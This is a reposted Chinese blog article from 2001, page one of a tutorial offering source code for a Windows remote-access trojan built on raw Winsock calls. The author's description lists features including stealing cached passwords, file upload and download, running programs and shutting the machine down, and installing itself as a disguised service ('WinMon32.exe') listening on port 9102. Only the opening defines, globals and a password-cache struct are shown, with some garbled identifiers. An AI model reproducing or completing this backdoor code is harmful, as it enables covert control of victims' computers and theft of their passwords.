一个简单木马列子(1) (转)

一个简单木马列子(1) (转)[@more@] 一个简单木马列子(1)

[ 作者: 病毒   添加时间: 2001-5-21 下午 06:12:02 ]


来源:绿色兵团

俺写文章一般都赋 源代码.除关键部分外向来不爱打太多说明性文字,因为觉得这样
才比较实际,关于那些 函数用法和功能大可以去翻书,哪里讲的比谁都详细.

这里给了一个俺用异步SOCKET方式, 直接 调用WINSOCK api,WIN SDK写的木马(VC,C++ BUILDER下均编译, 调试通过),无须客户端,编译后才几十K.实现了些 主要功能, 文件浏览, 上传, 下载(均支持统配符),改变目录,获取 系统信息,从CACHE取密码, 执行文件,显示进程, 发送消息,关机, 还有些控制功能, WIN 9X,NT/2000下均 可使用,在NT,2000下,因考虑到如CMD.EXE已改名或不存在,那么 程序 将毫无用处. 所以 并没有调用CMD.EXE来完成,全部由自己来做,WIN API实现.要想自己程序通用就不要怕 麻烦.建议那些用现成 控件写木马和 网络通讯的朋友应该看看,去熟悉这些根本所在, 尤其是在网络 通讯方面.如果你是个程序员 我想大可不必用我多说,在开发中俺还没见过哪家公司让 用现成类 (MFC,VCL)来做的.

此程序还不很健壮,写完后也没来的及 优化,主要是拿来让大家熟悉一下WINSOCK和WIN SDK 编程.


//---------------------------------------------------------------------------
// WINSOCK API,WIN SDK编程,无需客户端
//
// 作者: 贾佳
//---------------------------------------------------------------------------

#include < windows.h>
#include
#include
#pragma hdrstop
#include
#pragma argsused

#define RUN "WinMon32.exe"

//注册服务
#define SERVICE_PROC 1
//卸载服务
#define UNSERVICE_PROC 0

#define TH32CS_SNAPPROCESS 0x00000002
#define PROCESS_HANDLE_NAME 255

//缓冲区长度
#define dwBuffSize 2048
//命令行长度
#define dwComm 50
#define PORT 9102
#define WM_SOCKET WM_USER+1
#define PROMPT "LanLan:>"

D word dwVersion=MAKEWORD(1,1);
DWORD dwFlag=TRUE;
WSADATA wsaData;
SOCKET CreateSock,NewSock;
SOCKADDR_IN Sock_in,NewSock_in;
LPTSTR szRea dbuff,Ob,TempBuff;
int addrlen;

//CACHE PASSWORD结构
typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry;
WORD cbRe source;
WORD cbPassword;


    .NET/getc/data/200105/2118104901_1.htm">下一页 8

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10752043/viewspace-989139/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10752043/viewspace-989139/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值